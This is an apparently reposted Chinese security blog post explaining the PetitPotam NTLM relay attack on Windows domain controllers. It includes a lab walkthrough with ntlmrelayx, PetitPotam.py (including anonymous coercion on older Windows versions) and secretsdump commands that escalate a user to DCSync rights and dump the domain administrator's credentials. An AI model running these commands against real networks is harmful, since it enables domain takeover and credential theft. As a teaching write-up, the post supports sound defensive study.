PetitPotam NTLM relay attack接管域控

admin 2025年6月18日23:02:11评论1 views字数 1437阅读4分47秒阅读模式

PetitPotam

Windows 操作系统中一个新发现的安全漏洞可被利用来强制远程 Windows 服务器(包括域控制器)向恶意目的地进行身份验证,从而允许攻击者发起 NTLM 中继攻击并完全接管 Windows 域。

这个被称为  PetitPotam  的漏洞通过强制“Windows 主机通过 MS 向其他机器进行身份验证而起作用” -EFSRPC EfsRpcOpenFileRaw 函数。

MS-EFSRPC

MS-EFSRPC是 Microsoft 的加密文件系统远程协议,用于对远程存储和通过网络访问的加密数据执行“维护和管理操作”。

具体来说,该攻击使域控制器能够使用 MS-EFSRPC 接口在恶意行为者的控制下对远程 NTLM 进行身份验证并共享其身份验证信息。这是通过连接到LSARPC来完成的,从而导致目标服务器连接到任意服务器并执行 NTLM 身份验证的场景。

 攻击者可以通过使用 MS-EFSRPC 协议将 DC NTLM 凭据中继到 Active Directory 证书服务 AD CS Web 注册页面以注册 DC 证书,从而以域控制器为目标来发送其凭据。这将有效地为攻击者提供一个身份验证证书,该证书可用于作为 DC 访问域服务并破坏整个域。

Printerbug使得拥有控制域用户/计算机的攻击者可以指定域内的一台服务器,并使其对攻击者选择的目标进行身份验证。虽然不是一个微软承认的漏洞,但是跟Net-ntlmV1,非约束委派,NTLM_Relay,命名管道模拟这些手法的结合可以用来域内提权,本地提权,跨域等等利用。

遗憾的是,在PrintNightmare爆发之后,很多企业会选择关闭spoolss服务,使得Printerbug失效。在Printerbug逐渐失效的今天,PetitPotam来了,他也可以指定域内的一台服务器,并使其对攻击者选择的目标进行身份验证。而且在低版本(16以下)的情况底下,可以匿名触发。

Petitpotam

Petitpotam是继Windows PrintSpooler之后的一个无需验证,即可强制任意机器访问指定服务的漏洞。

环境

HostName IP
exchange 10.1.1.17
DC 10.1.1.14
MAC 192.168.2.149

1.利用

PetitPotam NTLM relay attack接管域控

 python3 ntlmrelayx.py --remove-mic --escalate-user web -t ldap://10.1.1.14 -smb2support

PetitPotam NTLM relay attack接管域控

 --remove-mic   #清楚mic标志 --escalate-user  #赋予指定用户dcsync权限 -smb2support  #支持SMB2协议 -t #将票据中继到指定的ldap

PetitPotam NTLM relay attack接管域控

python PetitPotam.py -d qin9.com -u mail -p 123.mail 192.168.2.149 10.1.1.18

PetitPotam NTLM relay attack接管域控

python3 secretsdump.py qin9/web:[email protected] -just-dc-user qin9/administrator

PetitPotam NTLM relay attack接管域控

2、低版本可以匿名触发

在08和12的环境,默认在网络安全:可匿名访问的命名管道中有三个netlogonsamrlsarpc。因此在这个环境下是可以匿名触发的

python PetitPotam.py  -d '' -u '' -p '' 192.168.2.149 10.1.1.17

PetitPotam NTLM relay attack接管域控

PetitPotam NTLM relay attack接管域控

至于我们还可以通过PetitPotam干嘛,之后会介绍的

原文始发于微信公众号(qin9):PetitPotam NTLM relay attack接管域控

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月18日23:02:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PetitPotam NTLM relay attack接管域控https://cn-sec.com/archives/964234.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息